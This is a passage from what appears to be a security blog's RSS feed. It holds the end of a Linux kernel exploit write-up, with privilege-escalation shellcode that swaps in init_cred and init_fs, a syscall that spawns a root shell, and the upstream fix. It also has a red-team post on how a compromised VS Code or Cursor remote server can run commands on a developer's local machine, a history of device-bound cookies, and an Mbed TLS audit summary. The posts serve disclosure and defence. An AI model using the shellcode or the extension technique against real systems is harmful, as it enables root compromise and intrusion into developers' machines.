mov QWORD PTR [rax + 0x7d0], rdi  ; task-&gt;real_cred = init_cred
mov QWORD PTR [rax + 0x7d8], rdi  ; task-&gt;cred = init_cred
mov QWORD PTR [rax + 0x828], rcx  ; task-&gt;fs = init_fs
jmp r8                            ; return via __x86_return_thunk</code></pre></div><p>The shellcode passes init_cred and init_fs addresses through syscall arguments (encoded across rdi/rsi/rcx/r8), replacing the calling process&#8217;s credentials with init_cred (root) and its filesystem namespace with init_fs (escaping the container). One syscall(SYS_kcmp, ...) call and the process is root with access to the host filesystem:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;ff7436e5-cb7e-4c99-b7a8-11170408180d&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">syscall(SYS_kcmp,
    (u32)(init_cred &gt;&gt; 32), (u32)(init_cred),
    -1, init_fs, __x86_return_thunk);
execve(&#8221;/bin/sh&#8221;, sh_args, NULL);  // root shell</code></pre></div><h2>The Fix</h2><p>The fix is elegant &#8212; just two lines of logic change in packet_set_ring(), mirroring an earlier fix (commit 15fe076edea7):</p><p><strong>Before (vulnerable)</strong>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;19e0fc93-4179-41cf-b865-262df1fdec8b&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">```c
spin_lock(&amp;po-&gt;bind_lock);
was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING);
num = po-&gt;num;
if (was_running) {
    WRITE_ONCE(po-&gt;num, 0);        // conditional!
    __unregister_prot_hook(sk, false);
}
spin_unlock(&amp;po-&gt;bind_lock);
// ... critical section ...
spin_lock(&amp;po-&gt;bind_lock);
if (was_running) {
    WRITE_ONCE(po-&gt;num, num);      // conditional!
    register_prot_hook(sk);
}
spin_unlock(&amp;po-&gt;bind_lock);</code></pre></div><p><strong>After (fixed)</strong>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:&quot;70b4f3eb-b3e5-46bb-9e35-45f467d6fb69&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">spin_lock(&amp;po-&gt;bind_lock);
was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING);
num = po-&gt;num;
WRITE_ONCE(po-&gt;num, 0);            // unconditional!
if (was_running)
    __unregister_prot_hook(sk, false);
spin_unlock(&amp;po-&gt;bind_lock);
// ... critical section ...
spin_lock(&amp;po-&gt;bind_lock);
WRITE_ONCE(po-&gt;num, num);          // unconditional!
if (was_running)
    register_prot_hook(sk);
spin_unlock(&amp;po-&gt;bind_lock);</code></pre></div><p>By <em>unconditionally</em> zeroing po-&gt;num before releasing bind_lock, the fix ensures that packet_notifier()&#8217;s NETDEV_UP handler will see po-&gt;num == 0 and skip the register_prot_hook() call. The socket cannot be re-hooked during the critical window, regardless of whether it was running. The po-&gt;num value is unconditionally restored afterward.</p><h2>Takeaways</h2><h3>For Kernel Developers</h3><ol><li><p><strong>Be defensive about lock gaps.</strong> When code releases one lock and acquires another, consider what invariants might be violated in the gap. The fix here is instructive: even though zeroing po-&gt;num seemed unnecessary when the socket wasn&#8217;t running, it was the only safe choice because external events (netdev notifications) could observe the intermediate state.</p></li></ol><ol start="2"><li><p><strong>Conditional state updates are subtle.</strong> The original code&#8217;s if (was_running) guard on WRITE_ONCE(po-&gt;num, 0) made logical sense (&#8221;why zero it if it&#8217;s not running?&#8221;) but created a security hole. When state is used for synchronization across concurrent code paths, <strong>always set it to the safe value, not just when you think it matters</strong>.</p></li></ol><ol start="3"><li><p><strong>TPACKET_V3 metadata survives ring buffer free.</strong> The prb_bdqc structure retains stale pointers after packet_set_ring() frees the ring buffer. While fixing the race condition prevents the UAF, this stale metadata is a defense-in-depth concern.</p></li></ol><h3>For Security Researchers</h3><ol><li><p><strong>Look for sleeping mutex holders.</strong> The central insight of this exploit is a bug-finding pattern: find code sequences with a lock gap (release lock A, acquire lock B), then look for any code path that holds lock B and can sleep. Mutexes, unlike spinlocks, allow the holder to sleep, and kernel code is full of wait_for_completion(), schedule(), copy_from_user(), and similar calls inside mutex-protected sections. If you can trigger such a path, you&#8217;ve turned a nanosecond race into a controllable one.</p></li></ol><ol start="2"><li><p><strong>Conditional logic near locks is a smell.</strong> Any time you see a conditional that determines whether synchronization state is updated, ask: &#8220;What happens if the condition is false but some other code path is observing this state?&#8221; The if (was_running) pattern that caused this vulnerability is a recurring motif in kernel race conditions.</p></li></ol><ol start="3"><li><p><strong>Page allocator buddy splitting enables cross-order heap grooming.</strong> The exploit leverages the buddy allocator&#8217;s splitting behavior: when order-2 pages are exhausted, the allocator splits order-3 pages. This is used to place simple_xattr objects (order 2) adjacent to ring buffer blocks (order 3 for victim, order 2 for reclamation). Understanding buddy allocator behavior is essential for modern kernel exploitation.</p></li></ol><ol start="4"><li><p><strong>Multiple races can be chained.</strong> This exploit wins two separate races, each with different techniques (deterministic mutex holding for the first, BPF filter + timer interrupt for the second). The willingness to chain multiple probabilistic steps, retrying on failure, is what makes the full exploit chain possible.</p></li></ol><ol start="5"><li><p><strong>Modern mitigations increase complexity but don&#8217;t prevent exploitation.</strong> As described in the Background section, CONFIG_RANDOM_KMALLOC_CACHES and CONFIG_SLAB_VIRTUAL forced the exploit to use same-callsite allocations (ring buffers to reclaim ring buffers) rather than arbitrary cross-cache attacks. The entire exploit architecture &#8212; from using TX ring buffers to reclaim freed RX ring buffers, to spraying pgv arrays to corrupt other pgv arrays &#8212; is shaped by this constraint. It raises the bar significantly but, as demonstrated, does not stop a determined attacker with a sufficiently powerful vulnerability.</p></li></ol>]]></content:encoded></item><item><title><![CDATA[A history of device-bound cookies]]></title><description><![CDATA[The recent announcement from Google about Device Bound Session Credentials (DBSC) sent me down memory lane.]]></description><link>https://blog.calif.io/p/a-history-of-device-bound-cookies</link><guid isPermaLink="false">https://blog.calif.io/p/a-history-of-device-bound-cookies</guid><dc:creator><![CDATA[Thai Duong]]></dc:creator><pubDate>Sun, 24 Aug 2025 10:47:12 GMT</pubDate><content:encoded><![CDATA[<p>The recent <a href="https://workspace.google.com/blog/identity-and-security/defending-against-account-takeovers-top-threats-passkeys-and-dbsc">announcement</a> from Google about Device Bound Session Credentials (<a href="https://github.com/w3c/webappsec-dbsc">DBSC</a>) sent me down memory lane.</p><p>Back when several TLS attacks were discovered, attacks that could let remote adversaries decrypt HTTPS cookies, I went searching for a stronger defense.</p><p>That is when I ran into <a href="https://www.linkedin.com/in/dirk-balfanz-7885852/?lipi=urn%3Ali%3Apage%3Ad_flagship3_detail_base%3BAGA6SJ0uTCO%2BvntGxbrgJQ%3D%3D">Dirk Balfanz</a>. He told me about Channel ID, or Channel-Bound Cookies. Dirk was one of the inventors of the security key, which I still consider one of the best security inventions of the past twenty years. When he spoke about authentication, I paid close attention.</p><p>Channel ID worked by giving each client machine a unique public key. During the TLS handshake, the client proved possession of the matching private key through a TLS extension. In effect, it was like TLS client authentication, only simpler because it avoided the complexity of renegotiation and certificates.</p><p>Cookies issued to the machine would then be bound to that machine ID. If the private key lived inside a security key or a TPM, the cookies could only be used on that specific machine. In theory, cookie theft would no longer be possible.</p><p>I loved the idea and volunteered to help make it real. That required changes in both Chrome and Google Accounts, the enormous authentication system behind all Google products. Google was so open at the time that a random engineer like me could contribute code, with reviews of course, to such critical infrastructure.</p><p>Most of my time, however, went into debugging. There were endless false positives. Broken TLS setups would cause machine IDs to change, and the server would mistakenly flag legitimate sessions as stolen cookies.</p><p>The deeper problem was that we could not find a single confirmed case of a Googler&#8217;s cookies being stolen. Maybe it never happened during the quarters I poured myself into the project. Or maybe it did, and those signals were simply lost in a flood of false alerts.</p><p>This was my 20% project. And when a 20% project stalls, you pick another. <a href="https://x.com/sirdarckcat?lang=en">Eduardo</a> soon asked me to implement PGP in JavaScript, which sounded much more fun than wrestling with TLS handshakes, so I told Dirk I was moving on.</p><blockquote><p>The Channel ID project failed, but it taught me a lasting lesson: security is not just about finding vulnerabilities. Real impact comes from building secure products and a safer Internet. Bug hunting is only one path. Security engineers must also fix issues and design systems that neutralize whole classes of flaws. This belief continues to guide our work at Calif.</p></blockquote><p>Fast forward to today. The new DBSC proposal has the same goal as Channel ID, stopping cookie theft by binding cookies to machines, but with important differences. Instead of anchoring the machine ID in TLS, it shifts up the stack to HTTP. And instead of a single machine ID across all connections to a domain, which could become a tracking vector, it uses unique session IDs managed with simple HTTP requests and responses.</p><p>And apparently, this simple design works!</p>]]></content:encoded></item><item><title><![CDATA[“Vibe Hacking”: Abusing Developer Trust in Cursor and VS Code Remote Development]]></title><description><![CDATA[Update: Mauro Soria pointed out that this attack vector can be easily adapted for phishing scenarios:]]></description><link>https://blog.calif.io/p/vibe-hacking-abusing-developer-trust</link><guid isPermaLink="false">https://blog.calif.io/p/vibe-hacking-abusing-developer-trust</guid><pubDate>Mon, 18 Aug 2025 10:27:47 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!mvoF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Update</strong>: <a href="https://www.linkedin.com/in/mauro-soria-63268b22/">Mauro Soria</a> pointed out that this attack vector can be easily adapted for phishing scenarios:</p><ol><li><p>Share a GitHub repo</p></li><li><p>Give some instructions to access the attacker server with Cursor or VS Code.</p></li></ol><p>Basically, if you click on something like <a href="http://vscode://vscode-remote/ssh-remote+user@hostname/home/user/project">vscode://vscode-remote/ssh-remote+user@hostname/home/user/project</a> to open VS Code, you might get popped!</p><p>In a recent red team engagement, the client's attack surface was so well-defended that after months of effort, the only system we managed to compromise was a lone server, which was apparently isolated from the rest of the network. Or so we thought.</p><p>One developer had been using that server for <a href="https://code.visualstudio.com/docs/remote/remote-overview">remote development</a> with <a href="https://cursor.com/">Cursor</a>. This setup is becoming increasingly popular: developers run AI agents remotely to protect their local machines.</p><p>But when we dug deeper into how Cursor works, we discovered something unsettling. By pivoting through the remote server, we could actually compromise the developer's local machine.</p><p>This wasn't a Cursor-specific flaw. The root cause lies in the Remote-SSH extension that Cursor inherits directly from VS Code. Which means the attack path we uncovered could extend across the entire VS Code remote development ecosystem, putting any developer who connects to an untrusted server at risk.</p><p>On the Remote-SSH extension <a href="https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-ssh">page</a>, Microsoft states:</p><blockquote><p><em>Only use Remote-SSH to connect to secure remote machines that you trust and that are owned by a party whom you trust. A compromised remote could use the VS Code Remote connection to execute code on your local machine.</em></p></blockquote><p>Despite clear warnings, a dangerous misconception persists among developers that "remote development" is fully isolated on the server. This belief is increasingly common as developers use remote environments as "sandboxes" to safely run AI agents without risking their local machines.</p><p>Given this powerful use case, the assumption of total isolation is understandable. However, Microsoft has <a href="https://github.com/microsoft/vscode-remote-release/issues/6608#issuecomment-1112960548">suggested</a> that no changes will be made to enhance the extension's safety to meet this expectation. This raises a critical question: how hard is it for your machine to be compromised if you connect to an untrusted server?</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!mvoF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!mvoF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 424w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 848w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!mvoF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg" width="1456" height="424" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:424,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!mvoF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 424w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 848w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!mvoF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ea069d7-0204-4e1e-be88-35fe95a38bf3_1600x466.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The answer: it's easy. <strong>Once the server is hacked, you are hacked as well</strong>. <a href="https://fly.io/blog/vscode-ssh-wtf/">Thomas Ptacek</a> outlined several attack paths, and our research uncovered a method to compromise the client without delving into low-level details. Our attack works in the default settings of Cursor or VS Code.</p><p>When you connect to a remote development server, a malicious extension on the server can execute the <a href="https://github.com/microsoft/vscode/blob/3f71dc0d8e0c8fdebc22f023909a6c19c5b50145/src/vs/workbench/contrib/terminal/electron-browser/terminalRemote.ts#L17">workbench.action.terminal.newLocal</a> command to open a terminal on your local machine. This is a terminal on your local machine, not the server. Once the terminal is open, the extension can execute the <a href="http://workbench.action.terminal.sendsequence">workbench.action.terminal.sendSequence</a> command to send text to the terminal and get it executed with a new line character (as if pressing Enter). We can also leverage another feature to establish a seamless Command &amp; Control channel between the server and the local machine, but that is beyond the scope of this post.</p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;77ef9934-782e-4e27-aa41-953402dcf13a&quot;,&quot;duration&quot;:null}"></div><p>Our goal in publishing this post is to raise awareness of the risks of remote development and to call for improvements that address the root causes of this issue. Monitoring the <strong>~/.cursor-server</strong> directory for changes can serve as a workaround, but it offers limited protection if the server is fully compromised. Securing the Remote-SSH extension is a better approach. For example, requiring user approval when a remote extension attempts to open a new local terminal or send keys to an active local terminal would help block the described attack. As there might be other attack vectors, fixing this issue entirely will take significant effort. A good direction is to move toward secure-by-default designs that don&#8217;t rely on users making trust decisions.</p><p>Contributors: Tuyen Le, An Nguyen, Khanh Pham</p>]]></content:encoded></item><item><title><![CDATA[Partnering with Google to Strengthen Open-Source Crypto: An Mbed TLS Security Audit]]></title><description><![CDATA[By Linh Le and Ngan Nguyen]]></description><link>https://blog.calif.io/p/partnering-with-google-to-strengthen</link><guid isPermaLink="false">https://blog.calif.io/p/partnering-with-google-to-strengthen</guid><pubDate>Sat, 05 Jul 2025 03:15:45 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!cETj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!cETj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!cETj!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 424w, https://substackcdn.com/image/fetch/$s_!cETj!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 848w, https://substackcdn.com/image/fetch/$s_!cETj!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 1272w, https://substackcdn.com/image/fetch/$s_!cETj!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!cETj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png" width="1456" height="1225" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1225,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:729593,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/167563472?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!cETj!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 424w, https://substackcdn.com/image/fetch/$s_!cETj!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 848w, https://substackcdn.com/image/fetch/$s_!cETj!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 1272w, https://substackcdn.com/image/fetch/$s_!cETj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6c6ae32-4bb1-4819-aa01-ef166530f080_1472x1238.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><h3><strong>Partnering with Google to Strengthen Open-Source Crypto: An Mbed TLS Security Audit</strong></h3><p>We're excited to share the results of a deep-dive security audit into <a href="https://github.com/Mbed-TLS/mbedtls">Mbed TLS</a> version 3.6.2, conducted in close collaboration with Google.</p><p>Mbed TLS is a C library that implements cryptographic primitives, X.509 certificate manipulation and the SSL/TLS and DTLS protocols. Its small code footprint makes it suitable for embedded systems.</p><p>As part of their ongoing commitment to securing the Internet's foundational software, Google Security Team commissioned Calif to proactively identify and fix potential vulnerabilities in the widely used open-source crypto library.</p><p>The assessment identified five vulnerabilities: one 'High' severity and four 'Medium' severity. All findings were disclosed to the Mbed TLS team in April 2025. We worked  with the Mbed TLS developers to ensure all vulnerabilities were understood, prioritized, and patched effectively. We're pleased to report that all identified issues have been addressed.</p><h3><strong>Vulnerabilities Addressed</strong></h3><p>Here is a list of the key vulnerabilities found during the assessment, along with links to the official Mbed TLS advisories and their assigned CVE numbers.</p><ul><li><p>(High) Misleading memory management in X.509 name parsing leading to arbitrary code execution</p><ul><li><p>CVE-2025-47917 | <a href="https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-06-7/">Mbed TLS Advisory</a></p></li></ul></li><li><p>(Medium)<strong> </strong>Unchecked return value in LMS verification allows signature bypass</p><ul><li><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49600">CVE-2025-49600</a> | <a href="https://github.com/Mbed-TLS/mbedtls-docs/blob/main/security-advisories/mbedtls-security-advisory-2025-06-3.md">Mbed TLS Advisory</a></p></li></ul></li><li><p>(Medium) Null pointer dereference in parsing X.509 distinguished names leading to DoS</p><ul><li><p>CVE-2025-48965 | <a href="https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-06-6/">Mbed TLS Advisory</a></p></li></ul></li><li><p>(Medium)<strong> </strong>Out-of-bounds read in LMS public key import leading to DoS or information disclosure</p><ul><li><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49601">CVE-2025-49601</a> | <a href="https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-06-4/">Mbed TLS Advisory</a></p></li></ul></li><li><p>(Medium) Integer underflow in decoding PEM keys leading to DoS</p><ul><li><p><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-52497">CVE-2025-52497</a> | <a href="https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2025-06-2/">Mbed TLS Advisory</a></p></li></ul></li></ul><p><strong>Take Action and Dig Deeper</strong></p><p>Thanks to this proactive initiative, the Mbed TLS library is now more secure. We strongly urge all users to upgrade to <strong>version 3.6.4</strong> or later.</p><p>This project is a powerful example of how targeted investment from companies like Google can directly improve the security of foundational software we all rely on.</p><ul><li><p>For a complete technical breakdown of each vulnerability, you can access the full report on our GitHub: <strong><a href="https://github.com/califio/publications/blob/main/security-audits/mbed-tls-3.6.2/Mbed-TLS-3.6.2-Security-Audit-Report.pdf">Read the Mbed TLS 3.6.2 Security Audit Report (PDF)</a></strong></p></li><li><p>To help the community, the custom <strong><a href="https://github.com/califio/publications/tree/main/security-audits/mbed-tls-3.6.2/wycheproof">Wycheproof test drivers</a></strong> we developed are publicly available for download. We encourage you to integrate them into your own testing pipelines.</p></li></ul>]]></content:encoded></item></channel></rss>